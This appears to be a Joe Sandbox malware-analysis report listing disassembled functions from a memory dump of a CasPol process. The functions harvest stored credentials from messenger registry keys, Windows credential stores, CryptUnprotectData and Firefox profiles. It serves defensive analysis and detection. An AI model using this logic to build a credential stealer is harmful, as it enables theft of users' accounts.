                                                                                                                                                                                      • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                                                                                                                                                                      • Part of subcall function 0040FF88: LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DB01
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?,?), ref: 0040DB8F
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 0040DC25
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • UserMicrosoft Exchange Instant Messaging, xrefs: 0040DC3B
                                                                                                                                                                                    • PasswordMicrosoft RTC Instant Messaging, xrefs: 0040DBA0
                                                                                                                                                                                    • Software\Microsoft\MSNMessenger, xrefs: 0040DAC1
                                                                                                                                                                                    • Software\Microsoft\MessengerService, xrefs: 0040DAF7, 0040DB85, 0040DC1B
                                                                                                                                                                                    • PasswordMicrosoft Exchange Instant Messaging, xrefs: 0040DC36
                                                                                                                                                                                    • UserMicrosoft RTC Instant Messaging, xrefs: 0040DBA5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open$ByteCharMultiWidememset$CredFreeLocalRead
                                                                                                                                                                                    • String ID: PasswordMicrosoft Exchange Instant Messaging$PasswordMicrosoft RTC Instant Messaging$Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService$UserMicrosoft Exchange Instant Messaging$UserMicrosoft RTC Instant Messaging
                                                                                                                                                                                    • API String ID: 2264331338-3472580514
                                                                                                                                                                                    • Opcode ID: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                                                                                                                                                                    • Instruction ID: 22d36e33a130c3ca974138f2eaaf9dbe6720f3348f6af52b077c8fd119907347
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a20be75106eef8afbc2690363f5f718c8396ca202439f642d4b7149e4ddfd6d
                                                                                                                                                                                    • Instruction Fuzzy Hash: CD711BB1D0025DAFDB10DFD5CD84AEEBBB8AB48309F5000BBE505B6241D7786A898B58
                                                                                                                                                                                    Function 0040BBF0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 311 40bbf0-40bc3e memset GetModuleFileNameA strrchr 312 40bc40 311->312 313 40bc43-40bcb8 _mbscat _mbscpy * 2 call 4039a8 311->313 312->313 316 40bcd4-40bcf2 313->316 317 40bcba-40bcc2 313->317 320 40bcf4 call 402d81 316->320 321 40bcf9-40bd0e call 40946f 316->321 317->316 318 40bcc4-40bcce GetWindowPlacement 317->318 318->316 320->321
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040BC14
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0040BC26
                                                                                                                                                                                    • strrchr.MSVCRT ref: 0040BC35
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040BC4F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040BC83
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040BC94
                                                                                                                                                                                    • GetWindowPlacement.USER32(00000000,?), ref: 0040BCCE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                    • String ID: .cfg$General$WinPos
                                                                                                                                                                                    • API String ID: 1012775001-3165880290
                                                                                                                                                                                    • Opcode ID: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                                                                                                                                                                    • Instruction ID: 4d3526ff516950935d38684931a8ffa2e994efc3bce567aa6e3141678cacb11c
                                                                                                                                                                                    • Opcode Fuzzy Hash: a0e6ba106d22b7fdb452a0395d51e5079dfe080821a02a89f5daf1cda0cefaef
                                                                                                                                                                                    • Instruction Fuzzy Hash: AC31B4729042189BDB11DB55DC45BCA77BC9F58704F0400FAE948AB282DBB45FC58FA8
                                                                                                                                                                                    Function 00410205 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 342 410205-410225 call 406b3b 345 410227 342->345 346 41022c-41023c call 404109 342->346 345->346 349 410242-41024b 346->349 350 410374-410380 call 404170 346->350 352 41024d-41025a CredEnumerateW 349->352 353 41025c 349->353 355 41025e-410260 352->355 353->355 355->350 356 410266-41026e 355->356 357 410274-41027e 356->357 358 41036e 356->358 359 410284-410287 357->359 360 41035e-410368 357->360 358->350 359->360 361 41028d-410290 359->361 360->357 360->358 361->360 362 410296-4102cb memset WideCharToMultiByte 361->362 362->360 363 4102d1-4102e9 _strnicmp 362->363 363->360 364 4102eb-410314 call 40fd01 WideCharToMultiByte 363->364 367 410316-410333 WideCharToMultiByte 364->367 368 41033a-410340 364->368 367->368 369 410342-410356 368->369 370 410358-41035b 368->370 369->360 370->360
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,7701485B,00000000), ref: 00410257
                                                                                                                                                                                    • memset.MSVCRT ref: 004102AA
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,7701485B,00000000), ref: 004102C3
                                                                                                                                                                                    • _strnicmp.MSVCRT ref: 004102DF
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00418AE0,000000FF,?,000000FF,00000000,00000000,?,?,?,?,7701485B,00000000), ref: 0041030D
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,7701485B,00000000), ref: 0041032C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$CredEnumerate_strnicmpmemset
                                                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                    • API String ID: 4106277485-3589380929
                                                                                                                                                                                    • Opcode ID: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                                                                                                                                                                    • Instruction ID: 25a7ce4e34514ebc1ab433be8417aa6076f8fd68c633d2ab3a6fecdf2bbac582
                                                                                                                                                                                    • Opcode Fuzzy Hash: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59414DB190021EAFDB149F94DD849EEB7BCBF08304F1441AAE915A3251D774EEC4CBA8
                                                                                                                                                                                    Function 0040260A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 372 40260a-40261c call 406b2a 375 402622-402640 RegOpenKeyExW 372->375 376 40272a-40272d 372->376 375->376 377 402646-4026a6 memset * 2 375->377 378 40270a-40271f RegEnumValueW 377->378 379 402721-402724 RegCloseKey 378->379 380 4026a8-4026e7 wcscpy call 40244d 378->380 379->376 380->379 384 4026e9-402707 380->384 384->378
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\America Online\AIM6\Passwords,00000000,00020019,?), ref: 00402638
                                                                                                                                                                                    • memset.MSVCRT ref: 0040265A
                                                                                                                                                                                    • memset.MSVCRT ref: 00402676
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004026BD
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,?), ref: 0040271B
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402724
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\America Online\AIM6\Passwords, xrefs: 0040262E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$CloseEnumOpenValuewcscpy
                                                                                                                                                                                    • String ID: Software\America Online\AIM6\Passwords
                                                                                                                                                                                    • API String ID: 295685061-818317896
                                                                                                                                                                                    • Opcode ID: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                                                                                                                                                                    • Instruction ID: 88eb4c74892045a3a61c352dacbb2536a85d96596cfce7057c4216d26753dbed
                                                                                                                                                                                    • Opcode Fuzzy Hash: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5311AB284011DAACB10DF91DC45EEFBBBCEF08344F1040A6A609F2180E77497998FA9
                                                                                                                                                                                    Function 004039A8 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 89COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 385 4039a8-403a0f call 40d339 call 40d725 393 403a14-403a47 memset sprintf 385->393 394 403a49-403a6a call 40d362 * 2 _strcmpi 393->394 395 403a7c-403aa4 call 40d362 * 2 call 411ec1 393->395 394->395 404 403a6c-403a7a 394->404 405 403aa7-403aab 395->405 404->405 405->393 406 403ab1-403ab3 405->406
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpimemsetsprintf
                                                                                                                                                                                    • String ID: AddExportHeaderLine$Folder%d$MarkOddEvenRows$SaveFilterIndex$ShowGridLines
                                                                                                                                                                                    • API String ID: 1148023869-3238971583
                                                                                                                                                                                    • Opcode ID: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                                                                                                                                                                    • Instruction ID: b4f0ac16e309dff731b59d997bf236358cc0e702142a5422807362b934f22301
                                                                                                                                                                                    • Opcode Fuzzy Hash: 41c6a4aa87f640e3ff617832b964f26cfa69aff41829c8ca8a21bee419e69aaf
                                                                                                                                                                                    • Instruction Fuzzy Hash: A22143717041046BCB19DFA8CC86FAAB7F8BF08705F14446EB44A97181EA78AE848B59
                                                                                                                                                                                    Function 0040876F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 409 40876f-408776 410 408778 call 4086ed 409->410 411 40877d-408789 409->411 410->411 412 40879b 411->412 413 40878b-408794 411->413 417 40879d-40879f 412->417 415 4087c6-4087d5 413->415 416 408796-408799 413->416 415->417 416->412 416->413 418 4088c0 417->418 419 4087a5-4087ab 417->419 422 4088c2-4088c4 418->422 420 4087d7-4087de 419->420 421 4087ad-4087bd 419->421 424 4087e0-408800 _mbscpy call 408bf9 420->424 425 408824-408837 call 4088c5 420->425 423 4087be-4087c4 421->423 427 408838-408840 LoadStringA 423->427 434 408802-408812 strlen 424->434 435 408814-408822 424->435 425->427 430 408842 427->430 432 408844-408853 430->432 433 4088b9-4088be 430->433 432->433 436 408855-408861 432->436 433->422 434->430 434->435 435->423 436->433 437 408863-4088b7 memcpy 436->437 437->418 437->433
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(0041E308,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403FEE,MessenPass), ref: 004087EA
                                                                                                                                                                                      • Part of subcall function 00408BF9: _itoa.MSVCRT ref: 00408C1A
                                                                                                                                                                                    • strlen.MSVCRT ref: 00408808
                                                                                                                                                                                    • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000001), ref: 00408877
                                                                                                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408715
                                                                                                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408733
                                                                                                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408751
                                                                                                                                                                                      • Part of subcall function 004086ED: ??2@YAPAXI@Z.MSVCRT ref: 00408761
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408783
                                                                                                                                                                                    • strings, xrefs: 004087E0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                    • API String ID: 4036804644-4125592482
                                                                                                                                                                                    • Opcode ID: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                                                                                                                                                                    • Instruction ID: dfb39b5d66abeec2138625290c7fe1e8033edbc7f9ca8f6d480f1a826448875f
                                                                                                                                                                                    • Opcode Fuzzy Hash: ef01070cab15df538a3798e247c3de3082de72e9928e1165ff50cbaae212c905
                                                                                                                                                                                    • Instruction Fuzzy Hash: 60316E3E6001119FD714AF16EE809F63769FB84308794843EEC81A72A6DB39A841CB5E
                                                                                                                                                                                    Function 0040FA34 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC6B
                                                                                                                                                                                      • Part of subcall function 0040FC4F: memset.MSVCRT ref: 0040FC82
                                                                                                                                                                                      • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCAD
                                                                                                                                                                                      • Part of subcall function 0040FC4F: _mbscat.MSVCRT ref: 0040FCD5
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FA77
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FA8E
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FA97
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FAF0
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FAFE
                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_mbscatmemset$_mbscpy
                                                                                                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                                                                                                    • API String ID: 29466866-467022611
                                                                                                                                                                                    • Opcode ID: ee6acc930cb9d74bf98811be63a8831f79d7bf82fd0cf47672f2f569cef0fbab
                                                                                                                                                                                    • Instruction ID: 51ac12969def4fbc614ccf7375ed6982ef447687ff00d0a07234f36c10d15357
                                                                                                                                                                                    • Opcode Fuzzy Hash: ee6acc930cb9d74bf98811be63a8831f79d7bf82fd0cf47672f2f569cef0fbab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A313271D05118ABDB10EBA5DC85BDDBBB89F01319F1044BBE514F2181DB38AB89CB59
                                                                                                                                                                                    Function 0040FC4F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FC6B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FC82
                                                                                                                                                                                      • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                      • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                                                                                                      • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040FCAD
                                                                                                                                                                                      • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                                                                                                                                                                      • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                                                                                                      • Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040FCD5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                                                                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                    • API String ID: 748118687-1174173950
                                                                                                                                                                                    • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                                                                                                                                                    • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
                                                                                                                                                                                    Function 0041212C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                    • RegCloseKey.KERNEL32(0040D439,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412167
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,0040D439,?,?,?,?,?,00000000,00000000), ref: 00412178
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 00412188
                                                                                                                                                                                      • Part of subcall function 00411D82: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SOFTWARE\Microsoft\Windows\CurrentVersion, xrefs: 00412137
                                                                                                                                                                                    • :\Program Files, xrefs: 0041217E
                                                                                                                                                                                    • ProgramFilesDir, xrefs: 00412150
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseDirectoryOpenQueryValueWindows_mbscat
                                                                                                                                                                                    • String ID: :\Program Files$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                    • API String ID: 3464146404-1099425022
                                                                                                                                                                                    • Opcode ID: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                                                                                                                                                                    • Instruction ID: 662ef04aa31600ef20de70b7cf87d02e8b1ceff17a77a69e12e4cdaece8db846
                                                                                                                                                                                    • Opcode Fuzzy Hash: c60afe78d3be907601b0948d5127775a3db94f7b53ba6c2000afb81737aee508
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DF0E972508300BFE7119754AD07BCA7FE88F04314F20005BF644A0181FAE96EC0C29D
                                                                                                                                                                                    Function 004085B9 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040733E: free.MSVCRT ref: 00407341
                                                                                                                                                                                      • Part of subcall function 0040733E: free.MSVCRT ref: 00407349
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000800), ref: 00408661
                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 0040866E
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040868B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$ByteCharMultiWide_wcslwrwcslen
                                                                                                                                                                                    • String ID: /$/
                                                                                                                                                                                    • API String ID: 4190021058-2523464752
                                                                                                                                                                                    • Opcode ID: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                                                                                                                                                                    • Instruction ID: 2a8444091b22e9eb4757945b889b84cf8c338ceadb4b858a9340bcb8d8787785
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09d1f8ade8d8357b66a16f8ed5e5d5d855b631777035325b7e6ae659001fd0a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5131A271500109EBDB11EF95CD819EEB3A8BF04345F10857EF585B3280DB78AE858BA8
                                                                                                                                                                                    Function 0040FF88 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404109: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00404116
                                                                                                                                                                                      • Part of subcall function 00404109: GetProcAddress.KERNEL32(00000000,CredReadW,?,?,?,?,?,?,?,?,?,?,?,?,0040DB18,?), ref: 0040412F
                                                                                                                                                                                      • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredFree,?,?,?,?,?,?,?,?,?,?,?,?,0040DB18,?), ref: 0040413B
                                                                                                                                                                                      • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredEnumerateW,?,?,?,?,?,?,?,?,?,?,?,?,0040DB18,?), ref: 00404147
                                                                                                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
                                                                                                                                                                                    • CredReadW.ADVAPI32(Passport.Net\*,00000004,00000000,?,7701485B), ref: 0040FFCF
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$ByteCharLibraryLoadMultiWide$CredFreeLocalRead
                                                                                                                                                                                    • String ID: Passport.Net\*
                                                                                                                                                                                    • API String ID: 3146130701-3671122194
                                                                                                                                                                                    • Opcode ID: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                                                                                                                                                                    • Instruction ID: a8053254f1e515f4d897164d33fe2023de59da6d422685d1f9c73d0263123044
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9231F7B1D01129AADB10DF95DC44EDEBBB8FF49750F11406BF610A7250D7789A81CBA8
                                                                                                                                                                                    Function 00407F7E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CDB
                                                                                                                                                                                      • Part of subcall function 00407C79: memset.MSVCRT ref: 00407CEF
                                                                                                                                                                                      • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D09
                                                                                                                                                                                      • Part of subcall function 00407C79: memset.MSVCRT ref: 00407D1E
                                                                                                                                                                                      • Part of subcall function 00407C79: GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                                                                                                      • Part of subcall function 00407C79: GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                                                                                                      • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                                                                                                      • Part of subcall function 00407C79: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                                                                                                      • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407D91
                                                                                                                                                                                      • Part of subcall function 00407C79: strlen.MSVCRT ref: 00407DA0
                                                                                                                                                                                      • Part of subcall function 00407C79: memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                                                                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                    • memset.MSVCRT ref: 00407FCC
                                                                                                                                                                                      • Part of subcall function 00411DEE: RegEnumKeyExA.KERNEL32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                                                                                                    • memset.MSVCRT ref: 00408019
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(000000FF,?,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 00408050
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,000000FF), ref: 00408075
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 00407F99
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
